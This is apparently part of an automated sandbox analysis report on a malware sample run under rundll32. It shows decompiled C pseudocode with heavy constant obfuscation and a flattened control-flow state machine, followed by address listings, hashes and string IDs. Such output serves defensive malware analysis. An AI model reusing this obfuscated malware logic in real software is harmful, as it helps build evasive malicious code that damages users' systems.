				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
				 *(_t489 + 0x80) = 0x96612e;
				_t475 = 0x1b;
				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
				 *(_t489 + 0x1c) = 0xc28e37;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
				 *(_t489 + 0x34) = 0xb1f5e0;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
				_t476 = 0x71;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
				 *(_t489 + 0x78) = 0xafc36d;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
				_t477 = 0x76;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
				 *(_t489 + 0x98) = 0x19521f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
				 *(_t489 + 0xa0) = 0x8c17;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
				 *(_t489 + 0xa4) = 0xd8bcc0;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
				 *(_t489 + 0x28) = 0x29b40a;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
				_t478 = 0x4b;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
				 *(_t489 + 0x58) = 0x4b8f45;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
				_t479 = 0x65;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
				 *(_t489 + 0x50) = 0xbe9ee7;
				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
				_t480 = 0x21;
				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
				 *(_t489 + 0x60) = 0x65600b;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
				 *(_t489 + 0x2c) = 0xa0640b;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
				_t487 =  *(_t489 + 0x80);
				_t481 = 0x18;
				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
				 *(_t489 + 0x88) = 0xf27f7;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
				 *(_t489 + 0x60) = 0x482c82;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
				 *(_t489 + 0x70) = 0x370d16;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
				 *(_t489 + 0x68) = 0x1def33;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
				 *(_t489 + 0x6c) = 0xb09c0e;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
				 *(_t489 + 0x54) = 0x47a16a;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
				 *(_t489 + 0x94) = 0xf12a19;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
				 *(_t489 + 0x14) = 0xa6bc3b;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
				_t482 = 0x17;
				_t468 =  *(_t489 + 0x7c);
				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
				 *(_t489 + 0x3c) = 0xc5a0fe;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
				_t418 =  *(_t489 + 0x7c);
				_t483 =  *(_t489 + 0x7c);
				 *(_t489 + 0x88) = 0x6bfd68;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
				 *(_t489 + 0x44) = 0xc29f93;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
				 *(_t489 + 0x34) = 0x1f0cbd;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
				while(1) {
					L1:
					_t393 = 0x26766da;
					L2:
					while(_t420 != 0x1be807e) {
						if(_t420 == _t393) {
							_t395 = E002B57CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
							_t489 = _t489 + 0x30;
							__eflags = _t395;
							if(_t395 == 0) {
								_t396 =  *(_t489 + 0xa4);
							} else {
								_t485 = _t468;
								while(1) {
									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
									if( *((intOrPtr*)(_t485 + 4)) != 4) {
										goto L18;
									}
									L17:
									_t349 = _t485 + 0xc; // 0x11e18
									_t401 = E002CFC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
									_t489 = _t489 + 0xc;
									__eflags = _t401;
									if(_t401 == 0) {
										_t396 = 1;
										 *(_t489 + 0xa4) = 1;
									} else {
										goto L18;
									}
									L23:
									_t483 =  *(_t489 + 0x7c);
									goto L24;
									L18:
									_t399 =  *_t485;
									__eflags = _t399;
									if(_t399 == 0) {
										_t396 =  *(_t489 + 0xa4);
									} else {
										_t485 = _t485 + _t399;
										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
										if( *((intOrPtr*)(_t485 + 4)) != 4) {
											goto L18;
										}
									}
									goto L23;
								}
							}
							L24:
							__eflags = _t396;
							if(__eflags == 0) {
								_t393 = 0x26766da;
								_t420 = 0x26766da;
								continue;
							} else {
								_t464 =  *0x2d5208; // 0x0
								E002B7519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
								_t420 = 0xa9f14cf;
								goto L1;
							}
							L32:
						} else {
							if(_t420 == 0x7d55797) {
								_t334 = _t489 + 0x28; // 0x6f6c7a54
								E002D12A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
								_t405 = E002C4FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
								_t487 = _t405;
								_t489 = _t489 + 0x14;
								_t420 = 0xe18b597;
								 *((short*)(_t405 - 2)) = 0;
								while(1) {
									L1:
									_t393 = 0x26766da;
									goto L2;
								}
							} else {
								if(_t420 == 0x9eda0b2) {
									E002C4DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
								} else {
									if(_t420 == 0xa9f14cf) {
										E002B68DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
										_t489 = _t489 + 0xc;
										_t420 = 0x9eda0b2;
										while(1) {
											L1:
											_t393 = 0x26766da;
											goto L2;
										}
									} else {
										if(_t420 == 0xacf19b8) {
											_t483 = 0x1000;
											_push(_t420);
											_push(_t420);
											 *(_t489 + 0x84) = 0x1000;
											_t468 = E002C3512(0x1000);
											_t393 = 0x26766da;
											__eflags = _t468;
											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
											continue;
										} else {
											if(_t420 != 0xe18b597) {
												L28:
												__eflags = _t420 - 0x5473740;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t416 = E002CE938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
												_t418 = _t416;
												_t489 = _t489 + 0x28;
												if(_t416 != 0xffffffff) {
													_t420 = 0xacf19b8;
													while(1) {
														L1:
														_t393 = 0x26766da;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L32;
					}
					_t420 = 0x7d55797;
					goto L28;
				}
			}




























                                                                                                                      0x002c99b0
                                                                                                                      0x002c99bd
                                                                                                                      0x002c99c6
                                                                                                                      0x002c99d1
                                                                                                                      0x002c99d6
                                                                                                                      0x002c99de
                                                                                                                      0x002c99e3
                                                                                                                      0x002c99eb
                                                                                                                      0x002c99f3
                                                                                                                      0x002c99fb
                                                                                                                      0x002c9a07
                                                                                                                      0x002c9a14
                                                                                                                      0x002c9a19
                                                                                                                      0x002c9a1f
                                                                                                                      0x002c9a27
                                                                                                                      0x002c9a2f
                                                                                                                      0x002c9a37
                                                                                                                      0x002c9a43
                                                                                                                      0x002c9a48
                                                                                                                      0x002c9a4e
                                                                                                                      0x002c9a56
                                                                                                                      0x002c9a5e
                                                                                                                      0x002c9a66
                                                                                                                      0x002c9a6e
                                                                                                                      0x002c9a73
                                                                                                                      0x002c9a7b
                                                                                                                      0x002c9a87
                                                                                                                      0x002c9a8c
                                                                                                                      0x002c9a97
                                                                                                                      0x002c9a98
                                                                                                                      0x002c9a9c
                                                                                                                      0x002c9aa4
                                                                                                                      0x002c9aac
                                                                                                                      0x002c9ab4
                                                                                                                      0x002c9abc
                                                                                                                      0x002c9ac1
                                                                                                                      0x002c9ac9
                                                                                                                      0x002c9ad4
                                                                                                                      0x002c9adf
                                                                                                                      0x002c9aea
                                                                                                                      0x002c9af5
                                                                                                                      0x002c9afd
                                                                                                                      0x002c9b08
                                                                                                                      0x002c9b10
                                                                                                                      0x002c9b18
                                                                                                                      0x002c9b20
                                                                                                                      0x002c9b28
                                                                                                                      0x002c9b35
                                                                                                                      0x002c9b39
                                                                                                                      0x002c9b47
                                                                                                                      0x002c9b4b
                                                                                                                      0x002c9b53
                                                                                                                      0x002c9b5b
                                                                                                                      0x002c9b63
                                                                                                                      0x002c9b68
                                                                                                                      0x002c9b70
                                                                                                                      0x002c9b78
                                                                                                                      0x002c9b80
                                                                                                                      0x002c9b88
                                                                                                                      0x002c9b92
                                                                                                                      0x002c9b9a
                                                                                                                      0x002c9baf
                                                                                                                      0x002c9bb2
                                                                                                                      0x002c9bb9
                                                                                                                      0x002c9bc4
                                                                                                                      0x002c9bcc
                                                                                                                      0x002c9bd4
                                                                                                                      0x002c9bdc
                                                                                                                      0x002c9be4
                                                                                                                      0x002c9bec
                                                                                                                      0x002c9bfc
                                                                                                                      0x002c9c04
                                                                                                                      0x002c9c09
                                                                                                                      0x002c9c0f
                                                                                                                      0x002c9c17
                                                                                                                      0x002c9c1f
                                                                                                                      0x002c9c27
                                                                                                                      0x002c9c30
                                                                                                                      0x002c9c35
                                                                                                                      0x002c9c3b
                                                                                                                      0x002c9c43
                                                                                                                      0x002c9c4e
                                                                                                                      0x002c9c59
                                                                                                                      0x002c9c64
                                                                                                                      0x002c9c6f
                                                                                                                      0x002c9c7a
                                                                                                                      0x002c9c85
                                                                                                                      0x002c9c90
                                                                                                                      0x002c9c9b
                                                                                                                      0x002c9ca6
                                                                                                                      0x002c9cae
                                                                                                                      0x002c9cb6
                                                                                                                      0x002c9cc3
                                                                                                                      0x002c9cc6
                                                                                                                      0x002c9cca
                                                                                                                      0x002c9cd2
                                                                                                                      0x002c9ce2
                                                                                                                      0x002c9ceb
                                                                                                                      0x002c9cee
                                                                                                                      0x002c9cf2
                                                                                                                      0x002c9cfa
                                                                                                                      0x002c9d0a
                                                                                                                      0x002c9d12
                                                                                                                      0x002c9d15
                                                                                                                      0x002c9d19
                                                                                                                      0x002c9d21
                                                                                                                      0x002c9d29
                                                                                                                      0x002c9d31
                                                                                                                      0x002c9d36
                                                                                                                      0x002c9d3e
                                                                                                                      0x002c9d46
                                                                                                                      0x002c9d53
                                                                                                                      0x002c9d5a
                                                                                                                      0x002c9d5f
                                                                                                                      0x002c9d65
                                                                                                                      0x002c9d6d
                                                                                                                      0x002c9d75
                                                                                                                      0x002c9d80
                                                                                                                      0x002c9d8b
                                                                                                                      0x002c9d96
                                                                                                                      0x002c9d9e
                                                                                                                      0x002c9da3
                                                                                                                      0x002c9da8
                                                                                                                      0x002c9db0
                                                                                                                      0x002c9db8
                                                                                                                      0x002c9dc0
                                                                                                                      0x002c9dc8
                                                                                                                      0x002c9dd0
                                                                                                                      0x002c9dd8
                                                                                                                      0x002c9ddd
                                                                                                                      0x002c9de5
                                                                                                                      0x002c9ded
                                                                                                                      0x002c9df5
                                                                                                                      0x002c9dfd
                                                                                                                      0x002c9e02
                                                                                                                      0x002c9e0a
                                                                                                                      0x002c9e12
                                                                                                                      0x002c9e1a
                                                                                                                      0x002c9e22
                                                                                                                      0x002c9e2a
                                                                                                                      0x002c9e35
                                                                                                                      0x002c9e3d
                                                                                                                      0x002c9e48
                                                                                                                      0x002c9e50
                                                                                                                      0x002c9e5c
                                                                                                                      0x002c9e5f
                                                                                                                      0x002c9e63
                                                                                                                      0x002c9e67
                                                                                                                      0x002c9e6f
                                                                                                                      0x002c9e77
                                                                                                                      0x002c9e7f
                                                                                                                      0x002c9e87
                                                                                                                      0x002c9e8f
                                                                                                                      0x002c9e94
                                                                                                                      0x002c9e9c
                                                                                                                      0x002c9ea0
                                                                                                                      0x002c9ea4
                                                                                                                      0x002c9eaf
                                                                                                                      0x002c9eba
                                                                                                                      0x002c9ec5
                                                                                                                      0x002c9ecd
                                                                                                                      0x002c9ed2
                                                                                                                      0x002c9ed6
                                                                                                                      0x002c9ede
                                                                                                                      0x002c9ee6
                                                                                                                      0x002c9eee
                                                                                                                      0x002c9ef6
                                                                                                                      0x002c9efe
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f0b
                                                                                                                      0x002c9f19
                                                                                                                      0x002ca08a
                                                                                                                      0x002ca08f
                                                                                                                      0x002ca092
                                                                                                                      0x002ca094
                                                                                                                      0x002ca0d4
                                                                                                                      0x002ca096
                                                                                                                      0x002ca096
                                                                                                                      0x002ca098
                                                                                                                      0x002ca098
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca09e
                                                                                                                      0x002ca09e
                                                                                                                      0x002ca0b2
                                                                                                                      0x002ca0b7
                                                                                                                      0x002ca0ba
                                                                                                                      0x002ca0bc
                                                                                                                      0x002ca0ca
                                                                                                                      0x002ca0cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca0e4
                                                                                                                      0x002ca0e4
                                                                                                                      0x00000000
                                                                                                                      0x002ca0be
                                                                                                                      0x002ca0be
                                                                                                                      0x002ca0c0
                                                                                                                      0x002ca0c2
                                                                                                                      0x002ca0dd
                                                                                                                      0x002ca0c4
                                                                                                                      0x002ca0c4
                                                                                                                      0x002ca098
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca09c
                                                                                                                      0x00000000
                                                                                                                      0x002ca0c2
                                                                                                                      0x002ca098
                                                                                                                      0x002ca0e8
                                                                                                                      0x002ca0e8
                                                                                                                      0x002ca0ea
                                                                                                                      0x002ca10c
                                                                                                                      0x002ca111
                                                                                                                      0x00000000
                                                                                                                      0x002ca0ec
                                                                                                                      0x002ca0f0
                                                                                                                      0x002ca0fc
                                                                                                                      0x002ca102
                                                                                                                      0x00000000
                                                                                                                      0x002ca102
                                                                                                                      0x00000000
                                                                                                                      0x002c9f1f
                                                                                                                      0x002c9f25
                                                                                                                      0x002ca01e
                                                                                                                      0x002ca022
                                                                                                                      0x002ca040
                                                                                                                      0x002ca045
                                                                                                                      0x002ca047
                                                                                                                      0x002ca04c
                                                                                                                      0x002ca051
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f2b
                                                                                                                      0x002c9f31
                                                                                                                      0x002ca13f
                                                                                                                      0x002c9f37
                                                                                                                      0x002c9f3d
                                                                                                                      0x002c9ffc
                                                                                                                      0x002ca001
                                                                                                                      0x002ca004
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f43
                                                                                                                      0x002c9f49
                                                                                                                      0x002c9fb3
                                                                                                                      0x002c9fc0
                                                                                                                      0x002c9fc1
                                                                                                                      0x002c9fc4
                                                                                                                      0x002c9fd1
                                                                                                                      0x002c9fd3
                                                                                                                      0x002c9fd9
                                                                                                                      0x002c9fe0
                                                                                                                      0x00000000
                                                                                                                      0x002c9f4b
                                                                                                                      0x002c9f51
                                                                                                                      0x002ca11d
                                                                                                                      0x002ca11d
                                                                                                                      0x002ca123
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca129
                                                                                                                      0x002c9f57
                                                                                                                      0x002c9f8f
                                                                                                                      0x002c9f94
                                                                                                                      0x002c9f96
                                                                                                                      0x002c9f9c
                                                                                                                      0x002c9fa2
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x00000000
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f06
                                                                                                                      0x002c9f9c
                                                                                                                      0x002c9f51
                                                                                                                      0x002c9f49
                                                                                                                      0x002c9f3d
                                                                                                                      0x002c9f31
                                                                                                                      0x002c9f25
                                                                                                                      0x002ca14a
                                                                                                                      0x002ca153
                                                                                                                      0x00000000
                                                                                                                      0x002ca153
                                                                                                                      0x002ca118
                                                                                                                      0x00000000
                                                                                                                      0x002ca118

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$r.5$A$r!
                                                                                                                      • API String ID: 0-357391454
                                                                                                                      • Opcode ID: 61e5174887cf1c2e2e74ba63229157b8b076969a6486f877f4c29db02f6e36f9
                                                                                                                      • Instruction ID: b5c2cec407d205564b82ef3222c56083da1cc9e91094d727881080327fb8db98
                                                                                                                      • Opcode Fuzzy Hash: 61e5174887cf1c2e2e74ba63229157b8b076969a6486f877f4c29db02f6e36f9
                                                                                                                      • Instruction Fuzzy Hash: 2E1241715183819FD3A8CF25C58AA5BBBE1FBC4358F108A1DF2DA86260D7B48959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B7B82 Relevance: 12.8, Strings: 10, Instructions: 339COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002B7B82(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t404;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t430;
				void* _t463;
				void* _t464;
				signed int* _t468;

				_t468 =  &_v2776;
				_v2716 = 0x9827f0;
				_v2716 = _v2716 << 9;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x0304fe29;
				_v2684 = 0x251356;
				_v2684 = _v2684 + 0x1e2;
				_v2684 = _v2684 | 0xda75bfb2;
				_v2684 = _v2684 ^ 0xda7428eb;
				_v2768 = 0x24e368;
				_v2768 = _v2768 ^ 0xd5a17b15;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 | 0xced33043;
				_v2768 = _v2768 ^ 0xced6ff80;
				_v2736 = 0xa2f196;
				_v2736 = _v2736 + 0x6d02;
				_v2736 = _v2736 << 8;
				_v2736 = _v2736 * 0x63;
				_t463 = __ecx;
				_v2736 = _v2736 ^ 0x2d971c6c;
				_t464 = 0x422d362;
				_v2760 = 0x391c44;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xe88b;
				_v2760 = _v2760 + 0x506d;
				_v2760 = _v2760 ^ 0x00052d5d;
				_v2744 = 0x960a81;
				_t421 = 3;
				_v2744 = _v2744 * 0x47;
				_v2744 = _v2744 * 0x66;
				_v2744 = _v2744 + 0x35e4;
				_v2744 = _v2744 ^ 0x94845397;
				_v2604 = 0xe8b0f5;
				_v2604 = _v2604 + 0x9847;
				_v2604 = _v2604 ^ 0x00e1425b;
				_v2712 = 0x9aefe1;
				_v2712 = _v2712 + 0x2d7a;
				_v2712 = _v2712 | 0x79d44310;
				_v2712 = _v2712 ^ 0x79db8805;
				_v2728 = 0x1377c5;
				_v2728 = _v2728 | 0x6e97ff53;
				_v2728 = _v2728 + 0x22de;
				_v2728 = _v2728 ^ 0x6e9b6172;
				_v2752 = 0xb1335e;
				_v2752 = _v2752 ^ 0x2dbaf336;
				_v2752 = _v2752 / _t421;
				_v2752 = _v2752 ^ 0xfe92c193;
				_v2752 = _v2752 ^ 0xf19577cc;
				_v2660 = 0x2952e4;
				_v2660 = _v2660 | 0x79708fb3;
				_v2660 = _v2660 ^ 0x797ec65d;
				_v2680 = 0x48d1a6;
				_t422 = 0x34;
				_v2680 = _v2680 / _t422;
				_v2680 = _v2680 * 0x69;
				_v2680 = _v2680 ^ 0x0099bc36;
				_v2612 = 0xcdd72a;
				_v2612 = _v2612 * 0x50;
				_v2612 = _v2612 ^ 0x4054338c;
				_v2672 = 0x8e3222;
				_v2672 = _v2672 << 1;
				_v2672 = _v2672 ^ 0x0115b014;
				_v2772 = 0xea36ba;
				_v2772 = _v2772 + 0xffff2869;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0xcd7b9291;
				_v2772 = _v2772 ^ 0xcd4b3afc;
				_v2776 = 0x8f99fe;
				_v2776 = _v2776 + 0x5190;
				_v2776 = _v2776 + 0xffffc7d6;
				_v2776 = _v2776 ^ 0x0f761f96;
				_v2776 = _v2776 ^ 0x0ff50908;
				_v2652 = 0xb833cd;
				_t423 = 0x31;
				_v2652 = _v2652 * 0x75;
				_v2652 = _v2652 ^ 0x5422af3f;
				_v2620 = 0x8c6cc6;
				_v2620 = _v2620 + 0xffff9da6;
				_v2620 = _v2620 ^ 0x008df9f5;
				_v2688 = 0x40b504;
				_v2688 = _v2688 ^ 0xc3e337a5;
				_v2688 = _v2688 + 0x808c;
				_v2688 = _v2688 ^ 0xc3a77743;
				_v2704 = 0x4030d0;
				_v2704 = _v2704 | 0xd8d5f091;
				_v2704 = _v2704 ^ 0xb4a4ac2b;
				_v2704 = _v2704 ^ 0x6c7bdbfc;
				_v2644 = 0xafd4ef;
				_v2644 = _v2644 * 0x3b;
				_v2644 = _v2644 ^ 0x288fb790;
				_v2764 = 0x1d91e2;
				_v2764 = _v2764 | 0xd96eda72;
				_v2764 = _v2764 + 0xffffbbe3;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000d90f8;
				_v2696 = 0x4b7a41;
				_v2696 = _v2696 | 0xbfeeeeed;
				_v2696 = _v2696 ^ 0xbfe32e95;
				_v2708 = 0x8f6339;
				_v2708 = _v2708 | 0xa71a0417;
				_v2708 = _v2708 + 0xffff51d8;
				_v2708 = _v2708 ^ 0xa79b9aa8;
				_v2636 = 0x12e7d6;
				_v2636 = _v2636 * 0x21;
				_v2636 = _v2636 ^ 0x026e6de9;
				_v2756 = 0xd5c5d;
				_v2756 = _v2756 ^ 0x716456fc;
				_v2756 = _v2756 + 0xa334;
				_v2756 = _v2756 >> 0xc;
				_v2756 = _v2756 ^ 0x000918e1;
				_v2608 = 0xbb78a7;
				_v2608 = _v2608 + 0xd6b3;
				_v2608 = _v2608 ^ 0x00b2dabe;
				_v2668 = 0xad3636;
				_v2668 = _v2668 + 0xffffa01e;
				_v2668 = _v2668 ^ 0x00a02f3e;
				_v2628 = 0x4494fc;
				_v2628 = _v2628 / _t423;
				_v2628 = _v2628 ^ 0x0009fca5;
				_v2748 = 0x660e04;
				_v2748 = _v2748 + 0xffffa723;
				_v2748 = _v2748 | 0x67469fe4;
				_t424 = 0x4b;
				_v2748 = _v2748 * 5;
				_v2748 = _v2748 ^ 0x050bc0b3;
				_v2616 = 0xd4c89d;
				_v2616 = _v2616 << 7;
				_v2616 = _v2616 ^ 0x6a6fac0f;
				_v2700 = 0xaa08c8;
				_v2700 = _v2700 + 0xffffd108;
				_v2700 = _v2700 / _t424;
				_v2700 = _v2700 ^ 0x0001fda8;
				_v2732 = 0x67cb1c;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 | 0x2b3c2ffa;
				_v2732 = _v2732 ^ 0x295e7aa1;
				_v2732 = _v2732 ^ 0x06a01d44;
				_v2656 = 0xfaf065;
				_v2656 = _v2656 + 0xffff35fd;
				_v2656 = _v2656 ^ 0x00f58676;
				_v2740 = 0x2bd94;
				_v2740 = _v2740 + 0x3f47;
				_t425 = 0x2a;
				_v2740 = _v2740 / _t425;
				_v2740 = _v2740 ^ 0xca3749d7;
				_v2740 = _v2740 ^ 0xca3fc9be;
				_v2664 = 0x3942c4;
				_v2664 = _v2664 << 0xe;
